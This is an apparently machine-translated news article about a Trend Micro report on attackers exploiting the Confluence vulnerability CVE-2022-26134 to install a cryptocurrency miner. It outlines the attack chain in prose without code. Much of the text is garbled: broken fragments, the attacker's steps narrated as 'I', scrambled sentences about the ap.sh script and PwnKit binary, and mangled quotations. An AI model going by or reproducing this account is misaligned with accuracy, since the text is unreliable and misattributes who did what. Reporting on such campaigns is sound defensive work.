Attackers are targeting unpatched Atlassian Confluence servers as part of an ongoing cryptocurrency mining campaign.
Trend Micro researchers warn of an ongoing cryptocurrency mining campaign targeting Atlassian’s Confluence servers. CVE-2022-26134 Vulnerability.
A critical security flaw that is currently being patched was made public by Atlassian in early June. The company warns of a critical unpatched remote code execution vulnerability that affects all supported versions of Confluence Server and Data Center and is being actively exploited in real-world attacks. did.
“we, CVE-2022-26134is a severity 9.8 Unauthenticated Remote Code Execution (RCE) vulnerability in the collaboration tool Atlassian Confluence. This gap is being exploited for malicious cryptocurrency mining. ” I Read Position Published by Trend Micro. “If exploited without a fix, this vulnerability can be used in multiple malicious attacks, including full infrastructure domain hijacking, deployment information stealers, remote access Trojans (RATs), and ransomware. may be.”
In one of the attacks our experts discovered, the attacker exploited this flaw to inject OGNL expressions to download and execute a shell script (“ro.sh”) on the victim’s machine. I then used a script to get his second shell script (“ap.sh”).
I used the ap.sh shell script to perform multiple actions. This can be done by updating your path variable to /tmp When /dev/shm path, download curl utility, disable iptablesOr change the firewall policy action as follows: acceptFlush all firewall rules.
This script also downloads binary files named: child, to exploit PwnKit vulnerability binary file is ap.sh A shell script for the following actions.
The final stage of the attack chain downloads the hezb malware and kills processes associated with other competing coin miners.
The shell script also disables Alibaba and Tencent cloud service provider agents and performs lateral movement over SSH.
“While we have confirmed that this vulnerability is being exploited by cybercriminals for illicit cryptocurrency mining activities, it is very easy to exploit for other breaches, so please patch this gap as soon as possible. We urge users to make it a priority to apply.” concludes the report. “The attacker used the injection of his own code for interpretation to gain access to his targeted Confluence domain and control the server for subsequent malicious activity. They can carry out a variety of attacks, from smashing to damaging the infrastructure itself.”
(Security related – hacking, Atlassian Confluence)